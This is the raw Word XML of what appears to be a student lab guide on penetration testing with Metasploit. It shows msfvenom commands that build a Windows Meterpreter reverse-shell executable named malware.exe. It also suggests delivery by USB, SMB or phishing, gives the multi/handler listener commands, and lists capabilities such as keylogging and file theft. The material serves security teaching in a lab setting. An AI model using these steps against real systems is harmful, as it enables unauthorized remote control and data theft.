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6601A" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Experiment 3: Penetration Testing using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A1B0F9" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:pict w14:anchorId="7DEEA52D">
          <v:rect id="_x0000_i1067" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="270EE6BF" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step-by-Step Guide (As Per the PDF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B70043" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:pict w14:anchorId="4743A01D">
          <v:rect id="_x0000_i1068" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6491B9C4" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 1: Open the Metasploit Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45909395" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>Run the following in the terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567AA3E1" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EDC608" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D2EBD5" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AE3CCB" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>This opens the Metasploit Framework Console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5F1FAD" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:pict w14:anchorId="0862609D">
          <v:rect id="_x0000_i1069" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="724EE0D9" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 2: Create Malware for the Specific System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5714DD17" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>Use msfvenom to generate a payload. For example, to create a reverse shell for a Windows system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5672A9B9" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E60D68" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9CF12D" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;your_ip&gt; LPORT=4444 -f exe &gt; malware.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DD0D22" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554DBD9F" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:t>-p specifies the payload type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227068A9" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:t>LHOST is your Kali IP address (use ifconfig to find it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6BE473" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:t>LPORT is the port Metasploit will listen on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F27ED70" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:t>-f exe makes it an executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CCBD79" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:t>Output: malware.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8DB85A" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:pict w14:anchorId="412125FA">
          <v:rect id="_x0000_i1070" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE63607" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 3: Load the Malware at the Target System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B38282" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>Transfer malware.exe to the target machine (this step is manual and based on your lab setup). Use methods like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A29881" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:t>USB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C1808E" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:t>SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6D8C71" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:t>Social Engineering (phishing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B1C87C" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:t xml:space="preserve">Or simulated environments like </w:t>
      </w:r>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploitable VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A64F312" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="2FBAB17A">
          <v:rect id="_x0000_i1071" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCDD1F5" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 4: Run the Malware at the Target System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFC645D" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t xml:space="preserve">On the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target system</w:t>
      </w:r>
      <w:r w:rsidRPr="00C75755">
        <w:t>, run the malware.exe (double click or run via terminal).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA3451D" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:pict w14:anchorId="28375E01">
          <v:rect id="_x0000_i1072" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9F30CB" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 5: Exploit the Target System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1FAB9E" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t xml:space="preserve">Back on your </w:t>
      </w:r>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali system</w:t>
      </w:r>
      <w:r w:rsidRPr="00C75755">
        <w:t>, set up a listener using Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6607BE5D" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521EDA43" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A82C70" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BD6DF9" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7830C684" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>set LHOST &lt;your_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023CA6B9" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD4C8EB" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2CC4AD" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t xml:space="preserve">Once the target runs the malware, you'll get a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Meterpreter shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00C75755">
        <w:t xml:space="preserve"> like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19820195" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8377B7" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D945F00" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>meterpreter &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700D73B1" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:t>From here, you can execute commands on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1C2E55" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:r w:rsidRPr="00C75755">
        <w:pict w14:anchorId="6F1E072E">
          <v:rect id="_x0000_i1073" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="072A556A" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧾</w:t>
      </w:r>
      <w:r w:rsidRPr="00C75755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1B7183" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:t>A successful Meterpreter session (remote shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDE9CA8" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:t>Ability to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602CD2CA" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:t>Browse files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329F6FAB" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:t>Capture screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298BB642" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:t>Record keystrokes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDBD239" w14:textId="77777777" w:rsidR="00C75755" w:rsidRPr="00C75755" w:rsidRDefault="00C75755" w:rsidP="00C75755">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75755">
        <w:t>Download/upload files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC107D7" w14:textId="77777777" w:rsidR="00C846EC" w:rsidRDefault="00C846EC"/>
    <w:sectPr w:rsidR="00C84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02764"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A7F8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E104F4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5A68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3022F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0A36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941195">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="243227106">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="180630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42"/>
    <w:rsid w:val="002D24C1"/>
    <w:rsid w:val="004A74B9"/>
    <w:rsid w:val="00550D4F"/>
    <w:rsid w:val="00564042"/>
    <w:rsid w:val="00C75755"/>
    <w:rsid w:val="00C846EC"/>
    <w:rsid w:val="00D1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C217C-F94D-4088-BF5C-1FAC0872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0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24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90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5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3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0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87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Sankhe</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Vedika Sankhe</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-22T19:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-22T19:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>